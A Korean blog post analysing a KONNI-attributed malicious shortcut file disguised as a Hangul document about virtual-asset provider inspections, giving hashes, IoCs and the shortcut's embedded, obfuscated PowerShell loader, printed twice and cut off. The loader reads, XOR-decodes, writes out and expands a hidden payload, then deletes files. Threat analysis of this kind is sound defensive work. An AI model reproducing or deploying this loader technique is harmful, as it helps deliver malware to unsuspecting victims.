북한 코니(KONNI)에서 만든 악성코드-가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk(2025.1.23)
Contents
오늘은 북한 해킹 그룹 코니(KONNI)에서 만든 악성코드-가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk(2025.1.23)에 대해서 알아보겠습니다.
파일명:가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk.lnk
사이즈:353,581,378 Bytes
MD5:e37c8f6aba686aab3d7ecedbd1d0ef43
SHA-256:5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Windows
Powershell\*(.)exe ^| findstr /i rshell(.)exe') do (if exist "%f" (%
f "functi(o)n float{param($vacuum); <#vindicate healing#>$wedge = $va
cuum(.)substring(0,$vacuum.length-4) + ''; <#bringing
stirring#>return $wedge;};function (p)ort{param($canon);<#face lack#>
remove-item <#pressure scorn(#)> -path $c(a0non <#compensation soil#>
-force;};function pompous{param($wear,$interior,$unusual,$knot(,)$stup
idity);<#houn(d) slight#> $wheat=New-Object (S)ystem.IO.FileStream(<#p
rovision resemble#>$wear,<#abundant olfactory#>[System.IO.FileMode]::O
pen,<#apron vanity#>[System.IO.FileA(c)cess]::Read);<#transient libert
y#> $wheat(.)Seek(<#associated distant#>$interior,[System(.)IO.SeekOrigin]::Begin);<#
aside wooden#> $border=$(u)nusual*0x01;<#vault porce(l)ain#> $willow=N(e)w-Object byt
e[] <#landscape fright#>$unusual; <#ingredient judge#> $coat=New-Object byte[] <#conc
rete retard#>$border; <#access saturate#>$wheat(.)Read(<#rare flash(i)ng#>$coat,0,<#w
ild residence#(>)$border); $wheat.C(l)ose();$park=0;whi(l)e($park -lt $unu(s)ual){<#c
ul(t)ivate stroke#>$willow[$park]=$coat[$park*0x01] -bxor $knot;$park++;}<#rifle purc
hase#> set-content $stupidity <#coupling litter#> $willow -Encoding <#create healthy#
> Byte;};(f)unction incorrect{param($condition, $bubble);<#edible situated#> expand $
condition <#inquire mute#> -F:* $bubble;};function intricate{($)sport = $env:pub(l)ic
<#capacity confession#> + '\' +<#w(o)lf favorite#> 'docu'(+)'men'(+)'ts';<#civil warf
are#> return $sport;};f(u)nction magnesia{param($looking); <#series estimation#>$tran
smit = Split-Path $looking;<#composition spit#> return $transmit;};function (i)mperfe
ct{return Get-Location;};function central{<#signify suspension#>return $env:Temp;};fu
nction thrush{$reproach = imperfect; $shifting = s(e)vere -steady $reproach; <#tas(t)
e path#>if($shifting.length -eq 0) {$reproach = central; <#obscene stupidity#>$shifti
ng …
파일명:가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk.lnk
사이즈:353,581,378 Bytes
MD5:e37c8f6aba686aab3d7ecedbd1d0ef43
SHA-256:5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Windows
Powershell\*(.)exe ^| findstr /i rshell(.)exe') do (if exist "%f" (%
f "functi(o)n float{param($vacuum); <#vindicate healing#>$wedge = $va
cuum(.)substring(0,$vacuum.length-4) + ''; <#bringing
stirring#>return $wedge;};function (p)ort{param($canon);<#face lack#>
remove-item <#pressure scorn(#)> -path $c(a0non <#compensation soil#>
-force;};function pompous{param($wear,$interior,$unusual,$knot(,)$stup
idity);<#houn(d) slight#> $wheat=New-Object (S)ystem.IO.FileStream(<#p
rovision resemble#>$wear,<#abundant olfactory#>[System.IO.FileMode]::O
pen,<#apron vanity#>[System.IO.FileA(c)cess]::Read);<#transient libert
y#> $wheat(.)Seek(<#associated distant#>$interior,[System(.)IO.SeekOrigin]::Begin);<#
aside wooden#> $border=$(u)nusual*0x01;<#vault porce(l)ain#> $willow=N(e)w-Object byt
e[] <#landscape fright#>$unusual; <#ingredient judge#> $coat=New-Object byte[] <#conc
rete retard#>$border; <#access saturate#>$wheat(.)Read(<#rare flash(i)ng#>$coat,0,<#w
ild residence#(>)$border); $wheat.C(l)ose();$park=0;whi(l)e($park -lt $unu(s)ual){<#c
ul(t)ivate stroke#>$willow[$park]=$coat[$park*0x01] -bxor $knot;$park++;}<#rifle purc
hase#> set-content $stupidity <#coupling litter#> $willow -Encoding <#create healthy#
> Byte;};(f)unction incorrect{param($condition, $bubble);<#edible situated#> expand $
condition <#inquire mute#> -F:* $bubble;};function intricate{($)sport = $env:pub(l)ic
<#capacity confession#> + '\' +<#w(o)lf favorite#> 'docu'(+)'men'(+)'ts';<#civil warf
are#> return $sport;};f(u)nction magnesia{param($looking); <#series estimation#>$tran
smit = Split-Path $looking;<#composition spit#> return $transmit;};function (i)mperfe
ct{return Get-Location;};function central{<#signify suspension#>return $env:Temp;};fu
nction thrush{$reproach = imperfect; $shifting = s(e)vere -steady $reproach; <#tas(t)
e path#>if($shifting.length -eq 0) {$reproach = central; <#obscene stupidity#>$shifti
ng …
IoC
e37c8f6aba686aab3d7ecedbd1d0ef43
5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892
5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892